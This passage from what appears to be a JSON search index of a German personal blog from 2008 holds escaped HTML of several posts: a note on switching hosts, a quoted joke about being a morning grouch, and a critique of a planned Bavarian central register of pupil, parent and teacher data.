die\nDomains zu einem Typo3-Hoster umziehen, habe mich aber noch nicht\nentschieden zu welchem. Wenn jemand Tipps hat, dann schreibt doch bitte\neinen Kommentar oder eine E-Mail.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-06-04-paula-angeln-und-verschlafener-fruhling/","title":"Paula, Angeln und verschlafener Frühling"},{"body":"Coole Sache, das werde ich auch mal ausprobieren! Das würde für mich als Morgenmuffel ziemlich gut passen. :-)\n\u0026lt;em\u0026gt;\u0026lt;a href=\u0026#34;http://nessy.twoday.net\u0026#34; target=\u0026#34;_blank\u0026#34;\u0026gt;Draußen nur Kännchen\u0026lt;/a\u0026gt;\u0026lt;/em\u0026gt;. Nessy sagt in ihrer Selbstbeschreibung über sich: \u0026lt;strong\u0026gt;Spricht vor elf Uhr morgens selten ganze Sätze, hält stattdessen Antworttäfelchen mit den Texten “Ja”, “Nein” und “Frage umformulieren” hoch.\u0026lt;/strong\u0026gt; [From \u0026lt;a href=\u0026#34;http://louffi.de/2008/06/04/ich-wunsch-mir-schone-tafeln/\u0026#34;\u0026gt;\u0026lt;cite\u0026gt;Ich wünsch’ mir schöne Tafeln\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;] ","excerpt":"\u003cp\u003eCoole Sache, das werde ich auch mal ausprobieren! Das würde für mich als\nMorgenmuffel ziemlich gut passen. :-)\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;em\u0026gt;\u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://nessy.twoday.net\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003etarget\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;_blank\u0026#34;\u003c/span\u003e\u0026gt;Draußen nur Kännchen\u0026lt;/a\u0026gt;\u0026lt;/em\u0026gt;.\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNessy sagt in ihrer Selbstbeschreibung über sich:\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;strong\u0026gt;Spricht vor elf Uhr morgens selten ganze Sätze, hält stattdessen Antworttäfelchen mit den Texten “Ja”, “Nein” und “Frage umformulieren” hoch.\u0026lt;/strong\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e[From \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://louffi.de/2008/06/04/ich-wunsch-mir-schone-tafeln/\u0026#34;\u003c/span\u003e\u0026gt;\u0026lt;cite\u0026gt;Ich wünsch’ mir schöne Tafeln\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;]\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","ref":"https://stoeps.de/posts/2008/2008-06-04-ich-wunsch-mir-schone-tafeln/","title":"Ich wünsch’ mir schöne Tafeln"},{"body":"Ich frage mich schön langsam für was wir diese ganze Datensammlungen und IDs brauchen. Nicht nur dass wir eine Steuer-ID erhalten, die nicht wie angekündigt nur von den Finanzämtern im Zugriff ist, jetzt bekommen unsere Kinder gleich noch eine lebenslange Schul-ID. Über Löschung und Auskünfte hat man sich nicht viele Gedanken gemacht.\nEin Gesetzentwurf der bayerischen Landesregierung sieht vor, ab Sommer 2008 Daten sämtlicher Schüler, deren Eltern und aller Lehrer zentral und personenbezogen zu sammeln („Totalerhebung“).\u0026lt;br /\u0026gt; [From \u0026lt;a href=\u0026#34;http://www.daten-speicherung.de/index.php/bayern-plant-totalerhebung-von-schueler-eltern-und-lehrerdaten/\u0026#34;\u0026gt;\u0026lt;cite\u0026gt;Bayern plant „Totalerhebung“ von Schüler-, Eltern- und Lehrerdaten\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;] Folgende Daten sollen erfaßt werden: \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;von Schülern:\u0026lt;/span\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;ul\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Name\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Adresse\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;schulische Daten\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u0026gt;Daten zur Schullaufbahn\u0026lt;/span\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;span style=\u0026#34;color: #333333; font-family: \u0026#39;Lucida Gra